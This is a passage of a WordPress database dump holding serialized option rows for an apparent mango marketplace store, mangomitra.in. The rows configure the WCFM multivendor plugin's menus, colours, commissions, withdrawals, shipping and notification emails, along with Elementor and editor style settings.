lass\";s:0:\"\";s:18:\"submenu_capability\";s:0:\"\";s:8:\"menu_for\";s:4:\"both\";s:6:\"custom\";s:2:\"no\";}i:9;a:12:{s:6:\"enable\";s:3:\"yes\";s:5:\"label\";s:6:\"Refund\";s:4:\"icon\";s:7:\"retweet\";s:4:\"slug\";s:20:\"wcfm-refund-requests\";s:3:\"url\";s:56:\"https://www.mangomitra.in/store-manager/refund-requests/\";s:10:\"capability\";s:0:\"\";s:9:\"new_label\";s:0:\"\";s:7:\"new_url\";s:0:\"\";s:9:\"new_class\";s:0:\"\";s:18:\"submenu_capability\";s:0:\"\";s:8:\"menu_for\";s:4:\"both\";s:6:\"custom\";s:2:\"no\";}i:10;a:12:{s:6:\"enable\";s:3:\"yes\";s:5:\"label\";s:15:\"Add to My Store\";s:4:\"icon\";s:12:\"hand-pointer\";s:4:\"slug\";s:23:\"wcfm-sell-items-catalog\";s:3:\"url\";s:64:\"https://www.mangomitra.in/store-manager/add-to-my-store-catalog/\";s:10:\"capability\";s:0:\"\";s:9:\"new_label\";s:0:\"\";s:7:\"new_url\";s:0:\"\";s:9:\"new_class\";s:0:\"\";s:18:\"submenu_capability\";s:0:\"\";s:8:\"menu_for\";s:4:\"both\";s:6:\"custom\";s:2:\"no\";}i:11;a:12:{s:6:\"enable\";s:3:\"yes\";s:5:\"label\";s:8:\"Settings\";s:4:\"icon\";s:4:\"cogs\";s:4:\"slug\";s:13:\"wcfm-settings\";s:3:\"url\";s:49:\"https://www.mangomitra.in/store-manager/settings/\";s:10:\"capability\";s:0:\"\";s:9:\"new_label\";s:0:\"\";s:7:\"new_url\";s:0:\"\";s:9:\"new_class\";s:0:\"\";s:18:\"submenu_capability\";s:0:\"\";s:8:\"menu_for\";s:4:\"both\";s:6:\"custom\";s:2:\"no\";}i:12;a:12:{s:6:\"enable\";s:3:\"yes\";s:5:\"label\";s:10:\"Capability\";s:4:\"icon\";s:10:\"user-times\";s:4:\"slug\";s:15:\"wcfm-capability\";s:3:\"url\";s:51:\"https://www.mangomitra.in/store-manager/capability/\";s:10:\"capability\";s:0:\"\";s:9:\"new_label\";s:0:\"\";s:7:\"new_url\";s:0:\"\";s:9:\"new_class\";s:0:\"\";s:18:\"submenu_capability\";s:0:\"\";s:8:\"menu_for\";s:4:\"both\";s:6:\"custom\";s:2:\"no\";}i:13;a:12:{s:6:\"enable\";s:3:\"yes\";s:5:\"label\";s:11:\"Ledger Book\";s:4:\"icon\";s:5:\"money\";s:4:\"slug\";s:11:\"wcfm-ledger\";s:3:\"url\";s:47:\"https://www.mangomitra.in/store-manager/ledger/\";s:10:\"capability\";s:0:\"\";s:9:\"new_label\";s:0:\"\";s:7:\"new_url\";s:0:\"\";s:9:\"new_class\";s:0:\"\";s:18:\"submenu_capability\";s:0:\"\";s:8:\"menu_for\";s:4:\"both\";s:6:\"custom\";s:2:\"no\";}i:14;a:12:{s:6:\"enable\";s:3:\"yes\";s:5:\"label\";s:7:\"Reports\";s:4:\"icon\";s:9:\"chart-pie\";s:4:\"slug\";s:12:\"wcfm-reports\";s:3:\"url\";s:62:\"https://www.mangomitra.in/store-manager/reports-sales-by-date/\";s:10:\"capability\";s:0:\"\";s:9:\"new_label\";s:0:\"\";s:7:\"new_url\";s:0:\"\";s:9:\"new_class\";s:0:\"\";s:18:\"submenu_capability\";s:0:\"\";s:8:\"menu_for\";s:4:\"both\";s:6:\"custom\";s:2:\"no\";}i:15;a:12:{s:6:\"enable\";s:3:\"yes\";s:5:\"label\";s:8:\"Payments\";s:4:\"icon\";s:11:\"credit-card\";s:4:\"slug\";s:13:\"wcfm-payments\";s:3:\"url\";s:45:\"https://mangomitra.in/store-manager/payments/\";s:10:\"capability\";s:0:\"\";s:9:\"new_label\";s:0:\"\";s:7:\"new_url\";s:0:\"\";s:9:\"new_class\";s:0:\"\";s:18:\"submenu_capability\";s:0:\"\";s:8:\"menu_for\";s:4:\"both\";s:6:\"custom\";s:2:\"no\";}i:16;a:12:{s:6:\"enable\";s:3:\"yes\";s:5:\"label\";s:7:\"Reviews\";s:4:\"icon\";s:11:\"comment-alt\";s:4:\"slug\";s:12:\"wcfm-reviews\";s:3:\"url\";s:44:\"https://mangomitra.in/store-manager/reviews/\";s:10:\"capability\";s:0:\"\";s:9:\"new_label\";s:0:\"\";s:7:\"new_url\";s:0:\"\";s:9:\"new_class\";s:0:\"\";s:18:\"submenu_capability\";s:0:\"\";s:8:\"menu_for\";s:4:\"both\";s:6:\"custom\";s:2:\"no\";}}','yes'),(1897,'wcfm_product_type_categories','a:0:{}','yes'),(1898,'wcfm_options','a:42:{s:21:\"quick_access_disabled\";s:3:\"yes\";s:23:\"dashboard_logo_disabled\";s:2:\"no\";s:20:\"welcome_box_disabled\";s:2:\"no\";s:13:\"menu_disabled\";s:2:\"no\";s:31:\"dashboard_theme_header_disabled\";s:2:\"no\";s:28:\"dashboard_full_view_disabled\";s:2:\"no\";s:19:\"slick_menu_disabled\";s:2:\"no\";s:30:\"responsive_float_menu_disabled\";s:3:\"yes\";s:21:\"float_button_disabled\";s:3:\"yes\";s:18:\"headpanel_disabled\";s:2:\"no\";s:23:\"checklist_view_disabled\";s:2:\"no\";s:19:\"tags_input_disabled\";s:2:\"no\";s:22:\"hover_submenu_disabled\";s:2:\"no\";s:29:\"wcfm_ultimate_notice_disabled\";s:2:\"no\";s:8:\"noloader\";s:2:\"no\";s:22:\"wcfm_quick_access_icon\";s:93:\"https://www.mangomitra.in/wp-content/plugins/wc-frontend-manager/assets/images/wcfm-30x30.png\";s:14:\"module_options\";a:19:{s:7:\"article\";s:3:\"yes\";s:8:\"customer\";s:3:\"yes\";s:8:\"policies\";s:3:\"yes\";s:10:\"membership\";s:3:\"yes\";s:7:\"profile\";s:3:\"yes\";s:10:\"withdrawal\";s:3:\"yes\";s:6:\"refund\";s:3:\"yes\";s:7:\"reviews\";s:3:\"yes\";s:11:\"store_hours\";s:3:\"yes\";s:5:\"media\";s:3:\"yes\";s:11:\"ledger_book\";s:3:\"yes\";s:7:\"catalog\";s:3:\"yes\";s:15:\"pay_for_product\";s:3:\"yes\";s:13:\"product_popup\";s:3:\"yes\";s:12:\"custom_field\";s:3:\"yes\";s:14:\"direct_message\";s:3:\"yes\";s:13:\"knowledgebase\";s:3:\"yes\";s:6:\"notice\";s:3:\"yes\";s:11:\"multi_store\";s:3:\"yes\";}s:18:\"analytics_disabled\";s:3:\"yes\";s:49:\"wc_frontend_manager_base_highlight_color_settings\";s:7:\"#17a2b8\";s:44:\"wc_frontend_manager_header_bg_color_settings\";s:7:\"#1C2B36\";s:46:\"wc_frontend_manager_header_text_color_settings\";s:7:\"#ffffff\";s:47:\"wc_frontend_manager_dashboard_bg_color_settings\";s:7:\"#eceef2\";s:55:\"wc_frontend_manager_container_background_color_settings\";s:7:\"#ffffff\";s:45:\"wc_frontend_manager_primary_bg_color_settings\";s:7:\"#1C2B36\";s:47:\"wc_frontend_manager_primary_font_color_settings\";s:7:\"#ffffff\";s:47:\"wc_frontend_manager_secondary_bg_color_settings\";s:7:\"#1C2B36\";s:49:\"wc_frontend_manager_secondary_font_color_settings\";s:7:\"#17a2b8\";s:42:\"wc_frontend_manager_menu_bg_color_settings\";s:7:\"#1C2B36\";s:44:\"wc_frontend_manager_menu_icon_color_settings\";s:7:\"#ffffff\";s:54:\"wc_frontend_manager_menu_icon_active_bg_color_settings\";s:7:\"#17a2b8\";s:51:\"wc_frontend_manager_menu_icon_active_color_settings\";s:7:\"#ffffff\";s:52:\"wc_frontend_manager_button_background_color_settings\";s:7:\"#1C2B36\";s:46:\"wc_frontend_manager_button_text_color_settings\";s:7:\"#b0bec5\";s:15:\"email_from_name\";s:10:\"MangoMitra\";s:25:\"wcfm_enquiry_button_label\";s:14:\"Ask a Question\";s:23:\"wcfm_enquiry_with_login\";s:2:\"no\";s:29:\"wcfm_enquiry_allow_attachment\";s:2:\"no\";s:28:\"wcfm_enquiry_button_position\";s:10:\"bellow_atc\";s:26:\"wcfm_enquiry_custom_fields\";a:1:{i:0;a:4:{s:4:\"type\";s:4:\"text\";s:5:\"label\";s:0:\"\";s:7:\"options\";s:0:\"\";s:9:\"help_text\";s:0:\"\";}}s:18:\"email_from_address\";s:19:\"mango@homedirect.in\";s:16:\"email_cc_address\";s:0:\"\";s:17:\"email_bcc_address\";s:0:\"\";}','yes'),(1899,'wcfm_style_custom','wcfm-style-custom-1666941876.css','yes'),(1900,'wcfm_product_custom_fields','a:1:{i:0;a:4:{s:10:\"block_name\";s:0:\"\";s:10:\"visibility\";s:0:\"\";s:10:\"group_name\";s:0:\"\";s:32:\"wcfm_product_custom_block_fields\";a:1:{i:0;a:6:{s:4:\"type\";s:4:\"text\";s:5:\"label\";s:0:\"\";s:4:\"name\";s:0:\"\";s:7:\"options\";s:0:\"\";s:7:\"content\";s:0:\"\";s:9:\"help_text\";s:0:\"\";}}}}','yes'),(1901,'wcfm_store_url','store','yes'),(1902,'wcfm_marketplace_options','a:33:{s:14:\"wcfm_store_url\";s:5:\"store\";s:14:\"vendor_sold_by\";s:3:\"yes\";s:13:\"sold_by_label\";s:0:\"\";s:23:\"vendor_sold_by_template\";s:8:\"advanced\";s:23:\"vendor_sold_by_position\";s:10:\"bellow_atc\";s:19:\"store_name_position\";s:9:\"on_banner\";s:18:\"store_list_sidebar\";s:2:\"no\";s:13:\"store_sidebar\";s:3:\"yes\";s:22:\"store_related_products\";s:7:\"default\";s:17:\"store_sidebar_pos\";s:4:\"left\";s:18:\"store_default_logo\";s:94:\"https://www.mangomitra.in/wp-content/plugins/wc-frontend-manager/assets/images/wcfmmp-blue.png\";s:20:\"store_default_banner\";s:104:\"https://www.mangomitra.in/wp-content/plugins/wc-multivendor-marketplace/assets/images/default_banner.jpg\";s:25:\"store_list_default_banner\";s:104:\"https://www.mangomitra.in/wp-content/plugins/wc-multivendor-marketplace/assets/images/default_banner.jpg\";s:18:\"store_banner_width\";s:4:\"1650\";s:19:\"store_banner_height\";s:3:\"350\";s:19:\"store_banner_mwidth\";s:3:\"520\";s:20:\"store_banner_mheight\";s:3:\"250\";s:9:\"store_ppp\";s:2:\"10\";s:18:\"product_mulivendor\";s:2:\"no\";s:10:\"order_sync\";s:2:\"no\";s:28:\"disable_multivendor_checkout\";s:3:\"yes\";s:24:\"disable_wcfm_store_setup\";s:2:\"no\";s:24:\"delete_data_on_uninstall\";s:2:\"no\";s:22:\"enable_wcfm_geo_locate\";s:2:\"no\";s:12:\"wcfm_map_lib\";s:6:\"google\";s:19:\"wcfm_google_map_api\";s:0:\"\";s:28:\"enable_wcfm_storelist_radius\";s:2:\"no\";s:26:\"enable_wcfm_product_radius\";s:2:\"no\";s:20:\"max_radius_to_search\";s:3:\"100\";s:11:\"radius_unit\";s:2:\"km\";s:21:\"show_product_location\";s:2:\"no\";s:22:\"checkout_user_location\";s:2:\"no\";s:19:\"default_geolocation\";a:3:{s:8:\"location\";s:0:\"\";s:3:\"lat\";s:10:\"30.0599153\";s:3:\"lng\";s:10:\"31.2620199\";}}','yes'),(1903,'wcfm_commission_options','a:14:{s:14:\"commission_for\";s:6:\"vendor\";s:15:\"commission_mode\";s:7:\"percent\";s:16:\"commission_fixed\";s:0:\"\";s:18:\"commission_percent\";s:2:\"90\";s:19:\"commission_by_sales\";a:1:{i:0;a:5:{s:5:\"sales\";s:0:\"\";s:4:\"rule\";s:4:\"upto\";s:4:\"type\";s:7:\"percent\";s:10:\"commission\";s:0:\"\";s:16:\"commission_fixed\";s:0:\"\";}}s:22:\"commission_by_products\";a:1:{i:0;a:5:{s:4:\"cost\";s:0:\"\";s:4:\"rule\";s:4:\"upto\";s:4:\"type\";s:7:\"percent\";s:10:\"commission\";s:0:\"\";s:16:\"commission_fixed\";s:0:\"\";}}s:22:\"commission_by_quantity\";a:1:{i:0;a:5:{s:8:\"quantity\";s:0:\"\";s:4:\"rule\";s:4:\"upto\";s:4:\"type\";s:7:\"percent\";s:10:\"commission\";s:0:\"\";s:16:\"commission_fixed\";s:0:\"\";}}s:12:\"get_shipping\";s:3:\"yes\";s:7:\"get_tax\";s:3:\"yes\";s:13:\"coupon_deduct\";s:3:\"yes\";s:19:\"admin_coupon_deduct\";s:3:\"yes\";s:10:\"tax_enable\";s:3:\"yes\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";}','yes'),(1904,'wcfm_withdrawal_options','a:29:{s:15:\"withdrawal_mode\";s:9:\"by_manual\";s:22:\"auto_withdrawal_status\";s:13:\"wc-processing\";s:19:\"withdrawal_schedule\";s:4:\"week\";s:12:\"order_status\";a:2:{i:0;s:13:\"wc-processing\";i:1;s:12:\"wc-completed\";}s:16:\"withdrawal_limit\";s:0:\"\";s:19:\"withdrawal_thresold\";s:0:\"\";s:24:\"withdrawal_reverse_limit\";s:0:\"\";s:15:\"payment_methods\";a:2:{i:0;s:6:\"paypal\";i:1;s:13:\"bank_transfer\";}s:21:\"stripe_split_pay_mode\";s:14:\"direct_charges\";s:16:\"paypal_client_id\";s:18:\"s0myGIPIfO9aHgceRb\";s:17:\"paypal_secret_key\";s:0:\"\";s:16:\"stripe_client_id\";s:0:\"\";s:20:\"stripe_published_key\";s:0:\"\";s:17:\"stripe_secret_key\";s:0:\"\";s:14:\"wirecard_token\";s:0:\"\";s:12:\"wirecard_key\";s:0:\"\";s:19:\"wirecard_public_key\";s:0:\"\";s:21:\"paypal_test_client_id\";s:0:\"\";s:22:\"paypal_test_secret_key\";s:0:\"\";s:21:\"stripe_test_client_id\";s:0:\"\";s:25:\"stripe_test_published_key\";s:0:\"\";s:22:\"stripe_test_secret_key\";s:0:\"\";s:19:\"wirecard_test_token\";s:0:\"\";s:17:\"wirecard_test_key\";s:0:\"\";s:24:\"wirecard_test_public_key\";s:0:\"\";s:23:\"transaction_charge_type\";s:2:\"no\";s:18:\"transaction_charge\";a:3:{s:3:\"cod\";a:1:{i:0;a:2:{s:7:\"percent\";s:0:\"\";s:5:\"fixed\";s:0:\"\";}}s:8:\"razorpay\";a:1:{i:0;a:2:{s:7:\"percent\";s:0:\"\";s:5:\"fixed\";s:0:\"\";}}s:7:\"sg_gpay\";a:1:{i:0;a:2:{s:7:\"percent\";s:0:\"\";s:5:\"fixed\";s:0:\"\";}}}s:22:\"withdrawal_charge_type\";s:2:\"no\";s:17:\"withdrawal_charge\";a:4:{s:6:\"paypal\";a:1:{i:0;a:3:{s:7:\"percent\";s:0:\"\";s:5:\"fixed\";s:0:\"\";s:3:\"tax\";s:0:\"\";}}s:6:\"stripe\";a:1:{i:0;a:3:{s:7:\"percent\";s:0:\"\";s:5:\"fixed\";s:0:\"\";s:3:\"tax\";s:0:\"\";}}s:6:\"skrill\";a:1:{i:0;a:3:{s:7:\"percent\";s:0:\"\";s:5:\"fixed\";s:0:\"\";s:3:\"tax\";s:0:\"\";}}s:13:\"bank_transfer\";a:1:{i:0;a:3:{s:7:\"percent\";s:0:\"\";s:5:\"fixed\";s:0:\"\";s:3:\"tax\";s:0:\"\";}}}}','yes'),(1905,'wcfm_shipping_options','a:1:{s:21:\"enable_store_shipping\";s:3:\"yes\";}','yes'),(1906,'woocommerce_wcfmmp_product_shipping_by_zone_settings','a:1:{s:7:\"enabled\";s:3:\"yes\";}','yes'),(1907,'woocommerce_wcfmmp_product_shipping_by_country_settings','a:3:{s:7:\"enabled\";s:3:\"yes\";s:5:\"title\";s:16:\"Regular Shipping\";s:10:\"tax_status\";s:7:\"taxable\";}','yes'),(1908,'_wcfmmp_shipping_by_country','a:6:{s:27:\"_wcfmmp_shipping_type_price\";s:0:\"\";s:26:\"_wcfmmp_additional_product\";s:0:\"\";s:22:\"_wcfmmp_additional_qty\";s:0:\"\";s:21:\"_free_shipping_amount\";s:0:\"\";s:18:\"_local_pickup_cost\";s:0:\"\";s:21:\"_wcfmmp_form_location\";s:0:\"\";}','yes'),(1909,'_wcfmmp_country_rates','a:0:{}','yes'),(1910,'_wcfmmp_state_rates','a:0:{}','yes'),(1911,'_wcfmmp_shipping_by_weight','a:2:{s:21:\"_free_shipping_amount\";s:3:\"500\";s:18:\"_local_pickup_cost\";s:0:\"\";}','yes'),(1912,'woocommerce_wcfmmp_product_shipping_by_weight_settings','a:1:{s:7:\"enabled\";s:3:\"yes\";}','yes'),(1913,'_wcfmmp_country_weight_rates','a:0:{}','yes'),(1914,'_wcfmmp_country_weight_mode','a:0:{}','yes'),(1915,'_wcfmmp_country_weight_unit_cost','a:0:{}','yes'),(1916,'_wcfmmp_country_weight_default_costs','a:0:{}','yes'),(1917,'_wcfmmp_shipping_by_distance','a:4:{s:13:\"_default_cost\";s:0:\"\";s:13:\"_max_distance\";s:0:\"\";s:21:\"_free_shipping_amount\";s:0:\"\";s:18:\"_local_pickup_cost\";s:0:\"\";}','yes'),(1918,'_wcfmmp_shipping_by_distance_rates','a:1:{i:0;a:3:{s:20:\"wcfmmp_distance_rule\";s:5:\"up_to\";s:20:\"wcfmmp_distance_unit\";s:0:\"\";s:21:\"wcfmmp_distance_price\";s:0:\"\";}}','yes'),(1919,'woocommerce_wcfmmp_product_shipping_by_distance_settings','a:3:{s:7:\"enabled\";s:2:\"no\";s:5:\"title\";s:13:\"Shipping Cost\";s:10:\"tax_status\";s:4:\"none\";}','yes'),(1920,'wcfm_refund_options','a:1:{s:16:\"refund_threshold\";s:0:\"\";}','yes'),(1921,'wcfm_review_options','a:1:{s:17:\"review_categories\";a:5:{i:0;a:1:{s:8:\"category\";s:7:\"Feature\";}i:1;a:1:{s:8:\"category\";s:6:\"Varity\";}i:2;a:1:{s:8:\"category\";s:11:\"Flexibility\";}i:3;a:1:{s:8:\"category\";s:8:\"Delivery\";}i:4;a:1:{s:8:\"category\";s:7:\"Support\";}}}','yes'),(1922,'wcfm_membership_options','a:2:{s:23:\"membership_reject_rules\";a:1:{s:17:\"required_approval\";s:3:\"yes\";}s:24:\"membership_type_settings\";a:0:{}}','yes'),(1923,'wcfmvm_hide_become_vendor','yes','yes'),(1924,'wcfmvm_registration_static_fields','a:0:{}','yes'),(1925,'wcfmvm_registration_custom_fields','a:2:{i:4;a:6:{s:6:\"enable\";s:3:\"yes\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:15:\"Whatsapp number\";s:7:\"options\";s:0:\"\";s:7:\"content\";s:0:\"\";s:9:\"help_text\";s:0:\"\";}i:5;a:6:{s:6:\"enable\";s:3:\"yes\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:24:\"Any Other contact number\";s:7:\"options\";s:0:\"\";s:7:\"content\";s:0:\"\";s:9:\"help_text\";s:0:\"\";}}','yes'),(1926,'wcfm_store_color_settings','a:18:{s:10:\"store_name\";s:7:\"#ffffff\";s:17:\"header_background\";s:7:\"#2f2f2f\";s:24:\"header_social_background\";s:7:\"#212121\";s:11:\"header_text\";s:7:\"#ffffff\";s:11:\"header_icon\";s:7:\"#17a2b8\";s:18:\"sidebar_background\";s:7:\"#efefef\";s:15:\"sidebar_heading\";s:7:\"#525252\";s:12:\"sidebar_text\";s:7:\"#9f9e9e\";s:9:\"tabs_text\";s:7:\"#999999\";s:16:\"tabs_active_text\";s:7:\"#17a2b8\";s:20:\"ctore_card_highlight\";s:7:\"#17a2b8\";s:21:\"ctore_card_title_text\";s:7:\"#000000\";s:15:\"ctore_card_text\";s:7:\"#ffffff\";s:9:\"button_bg\";s:7:\"#17a2b8\";s:11:\"button_text\";s:7:\"#ffffff\";s:16:\"button_active_bg\";s:7:\"#000000\";s:18:\"button_active_text\";s:7:\"#ffffff\";s:12:\"start_rating\";s:7:\"#FF912C\";}','yes'),(1927,'wcfmmp_style_custom','wcfmmp-style-custom-1666941876.css','yes'),(1928,'wcfmmp_notification_options','a:0:{}','yes'),(1929,'wcfmmp_notification_email','a:19:{s:6:\"direct\";s:19:\"mango@homedirect.in\";s:6:\"notice\";s:19:\"mango@homedirect.in\";s:14:\"product_review\";s:19:\"mango@homedirect.in\";s:14:\"product_lowstk\";s:19:\"mango@homedirect.in\";s:13:\"status-update\";s:19:\"mango@homedirect.in\";s:16:\"withdraw-request\";s:19:\"mango@homedirect.in\";s:14:\"refund-request\";s:19:\"mango@homedirect.in\";s:11:\"new_product\";s:19:\"mango@homedirect.in\";s:17:\"new_taxonomy_term\";s:19:\"mango@homedirect.in\";s:5:\"order\";s:19:\"mango@homedirect.in\";s:7:\"enquiry\";s:19:\"mango@homedirect.in\";s:12:\"registration\";s:19:\"mango@homedirect.in\";s:10:\"membership\";s:19:\"mango@homedirect.in\";s:15:\"vendor_approval\";s:19:\"mango@homedirect.in\";s:19:\"membership-reminder\";s:19:\"mango@homedirect.in\";s:17:\"membership-cancel\";s:19:\"mango@homedirect.in\";s:18:\"membership-expired\";s:19:\"mango@homedirect.in\";s:14:\"vendor-disable\";s:19:\"mango@homedirect.in\";s:13:\"vendor-enable\";s:19:\"mango@homedirect.in\";}','yes'),(1930,'wcfm_policy_options','a:4:{s:16:\"policy_tab_title\";s:0:\"\";s:15:\"shipping_policy\";s:11:\"<p><br></p>\";s:13:\"refund_policy\";s:11:\"<p><br></p>\";s:19:\"cancellation_policy\";s:11:\"<p><br></p>\";}','yes'),(1931,'wcfm_store_hours_options','a:1:{s:9:\"day_times\";a:7:{i:0;a:1:{i:0;a:2:{s:5:\"start\";s:0:\"\";s:3:\"end\";s:0:\"\";}}i:1;a:1:{i:0;a:2:{s:5:\"start\";s:0:\"\";s:3:\"end\";s:0:\"\";}}i:2;a:1:{i:0;a:2:{s:5:\"start\";s:0:\"\";s:3:\"end\";s:0:\"\";}}i:3;a:1:{i:0;a:2:{s:5:\"start\";s:0:\"\";s:3:\"end\";s:0:\"\";}}i:4;a:1:{i:0;a:2:{s:5:\"start\";s:0:\"\";s:3:\"end\";s:0:\"\";}}i:5;a:1:{i:0;a:2:{s:5:\"start\";s:0:\"\";s:3:\"end\";s:0:\"\";}}i:6;a:1:{i:0;a:2:{s:5:\"start\";s:0:\"\";s:3:\"end\";s:0:\"\";}}}}','yes'),(1932,'wcfm_data_cleanup_options','a:3:{s:31:\"messages_data_cleanup_more_than\";s:2:\"90\";s:30:\"inquiry_data_cleanup_more_than\";s:2:\"90\";s:32:\"analytics_data_cleanup_more_than\";s:2:\"90\";}','yes'),(1934,'wcfm_updated_end_point_sell_items_catalog','1','yes'),(1942,'wcfm_capability_options','a:7:{s:16:\"publish_products\";s:3:\"yes\";s:21:\"publish_live_products\";s:3:\"yes\";s:8:\"variable\";s:3:\"yes\";s:7:\"grouped\";s:3:\"yes\";s:8:\"external\";s:3:\"yes\";s:11:\"vnd_wpadmin\";s:3:\"yes\";s:16:\"customer_support\";s:3:\"yes\";}','yes'),(2429,'elementor_scheme_color','a:4:{i:1;s:7:\"#6ec1e4\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#61ce70\";}','yes'),(2430,'elementor_scheme_typography','a:4:{i:1;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"600\";}i:2;a:2:{s:11:\"font_family\";s:11:\"Roboto Slab\";s:11:\"font_weight\";s:3:\"400\";}i:3;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"400\";}i:4;a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:11:\"font_weight\";s:3:\"500\";}}','yes'),(2431,'elementor_scheme_color-picker','a:8:{i:1;s:7:\"#6ec1e4\";i:2;s:7:\"#54595f\";i:3;s:7:\"#7a7a7a\";i:4;s:7:\"#61ce70\";i:5;s:7:\"#4054b2\";i:6;s:7:\"#23a455\";i:7;s:4:\"#000\";i:8;s:4:\"#fff\";}','yes'),(2607,'wpse_auto_active_extra_plugins','no','yes'),(2608,'wpse_config','a:3:{s:13:\"disable_autop\";i:1;s:18:\"active_post_editor\";i:1;s:18:\"active_file_editor\";i:1;}','yes'),(2609,'wpse_custom_styles','a:8:{i:0;a:4:{s:2:\"id\";i:1;s:5:\"title\";s:12:\"Blue message\";s:4:\"name\";s:12:\"blue-message\";s:3:\"css\";s:129:\"background: none repeat scroll 0 0 #3399ff;\ncolor: #ffffff;\ntext-shadow: none;\nfont-size: 14px;\nline-height: 24px;\npadding: 10px;\";}i:1;a:4:{s:2:\"id\";i:2;s:5:\"title\";s:13:\"Green message\";s:4:\"name\";s:13:\"green-message\";s:3:\"css\";s:129:\"background: none repeat scroll 0 0 #8cc14c;\ncolor: #ffffff;\ntext-shadow: none;\nfont-size: 14px;\nline-height: 24px;\npadding: 10px;\";}i:2;a:4:{s:2:\"id\";i:3;s:5:\"title\";s:14:\"Orange message\";s:4:\"name\";s:14:\"orange-message\";s:3:\"css\";s:129:\"background: none repeat scroll 0 0 #faa732;\ncolor: #ffffff;\ntext-shadow: none;\nfont-size: 14px;\nline-height: 24px;\npadding: 10px;\";}i:3;a:4:{s:2:\"id\";i:4;s:5:\"title\";s:11:\"Red message\";s:4:\"name\";s:11:\"red-message\";s:3:\"css\";s:129:\"background: none repeat scroll 0 0 #da4d31;\ncolor: #ffffff;\ntext-shadow: none;\nfont-size: 14px;\nline-height: 24px;\npadding: 10px;\";}i:4;a:4:{s:2:\"id\";i:5;s:5:\"title\";s:12:\"Grey message\";s:4:\"name\";s:12:\"grey-message\";s:3:\"css\";s:129:\"background: none repeat scroll 0 0 #53555c;\ncolor: #ffffff;\ntext-shadow: none;\nfont-size: 14px;\nline-height: 24px;\npadding: 10px;\";}i:5;a:4:{s:2:\"id\";i:6;s:5:\"title\";s:10:\"Left block\";s:4:\"name\";s:10:\"left-block\";s:3:\"css\";s:199:\"background: none repeat scroll 0 0px, radial-gradient(ellipse at center center, #ffffff 0%, #f2f2f2 100%) repeat scroll 0 0 rgba(0, 0, 0, 0);\ncolor: #8b8e97;\npadding: 10px;\nmargin: 10px;\nfloat: left;\";}i:6;a:4:{s:2:\"id\";i:7;s:5:\"title\";s:11:\"Right block\";s:4:\"name\";s:11:\"right-block\";s:3:\"css\";s:200:\"background: none repeat scroll 0 0px, radial-gradient(ellipse at center center, #ffffff 0%, #f2f2f2 100%) repeat scroll 0 0 rgba(0, 0, 0, 0);\ncolor: #8b8e97;\npadding: 10px;\nmargin: 10px;\nfloat: right;\";}i:7;a:4:{s:2:\"id\";i:8;s:5:\"title\";s:11:\"Blockquotes\";s:4:\"name\";s:11:\"blockquotes\";s:3:\"css\";s:181:\"background: none;\nborder-left: 5px solid #f1f1f1;\ncolor: #8B8E97;\nfont-size: 14px;\nfont-style: italic;\nline-height: 22px;\npadding-left: 15px;\npadding: 10px;\nwidth: 60%;\nfloat: left;\";}}','yes'),(2610,'wpse_button_styles','a:3:{i:0;a:20:{s:2:\"id\";i:1;s:9:\"font-size\";s:2:\"13\";s:5:\"color\";s:7:\"#ffffff\";s:10:\"background\";s:7:\"#2196F3\";s:12:\"padding-left\";s:2:\"12\";s:11:\"padding-top\";s:1:\"6\";s:13:\"padding-right\";s:2:\"12\";s:14:\"padding-bottom\";s:1:\"6\";s:12:\"border-width\";s:1:\"1\";s:13:\"border-radius\";s:1:\"0\";s:12:\"border-color\";s:7:\"#2196F3\";s:11:\"color-hover\";s:7:\"#ffffff\";s:16:\"background-hover\";s:7:\"#2196F3\";s:12:\"border-style\";s:5:\"solid\";s:22:\"box-shadow-color-hover\";s:7:\"#bababa\";s:21:\"box-shadow-horz-hover\";s:1:\"3\";s:21:\"box-shadow-vert-hover\";s:1:\"3\";s:21:\"box-shadow-blur-hover\";s:1:\"3\";s:23:\"box-shadow-spread-hover\";s:1:\"0\";s:4:\"text\";s:11:\"Button text\";}i:1;a:20:{s:2:\"id\";i:2;s:9:\"font-size\";s:2:\"13\";s:5:\"color\";s:7:\"#ffffff\";s:10:\"background\";s:7:\"#009688\";s:12:\"padding-left\";s:2:\"12\";s:11:\"padding-top\";s:1:\"6\";s:13:\"padding-right\";s:2:\"12\";s:14:\"padding-bottom\";s:1:\"6\";s:12:\"border-width\";s:1:\"1\";s:13:\"border-radius\";s:1:\"0\";s:12:\"border-color\";s:7:\"#2196F3\";s:11:\"color-hover\";s:7:\"#ffffff\";s:16:\"background-hover\";s:7:\"#009688\";s:12:\"border-style\";s:5:\"solid\";s:22:\"box-shadow-color-hover\";s:7:\"#bababa\";s:21:\"box-shadow-horz-hover\";s:1:\"3\";s:21:\"box-shadow-vert-hover\";s:1:\"3\";s:21:\"box-shadow-blur-hover\";s:1:\"3\";s:23:\"box-shadow-spread-hover\";s:1:\"0\";s:4:\"text\";s:11:\"Button text\";}i:2;a:20:{s:2:\"id\";i:3;s:9:\"font-size\";s:2:\"13\";s:5:\"color\";s:7:\"#ffffff\";s:10:\"background\";s:7:\"#0097a7\";s:12:\"padding-left\";s:2:\"12\";s:11:\"padding-top\";s:1:\"6\";s:13:\"padding-right\";s:2:\"12\";s:14:\"padding-bottom\";s:1:\"6\";s:12:\"border-width\";s:1:\"1\";s:13:\"border-radius\";s:1:\"0\";s:12:\"border-color\";s:7:\"#2196F3\";s:11:\"color-hover\";s:7:\"#ffffff\";s:16:\"background-hover\";s:7:\"#0097a7\";s:12:\"border-style\";s:5:\"solid\";s:22:\"box-shadow-color-hover\";s:7:\"#bababa\";s:21:\"box-shadow-horz-hover\";s:1:\"3\";s:21:\"box-shadow-vert-hover\";s:1:\"3\";s:21:\"box-shadow-blur-hover\";s:1:\"3\";s:23:\"box-shadow-spread-hover\";s:1:\"0\";s:4:\"text\";s:11:\"Button 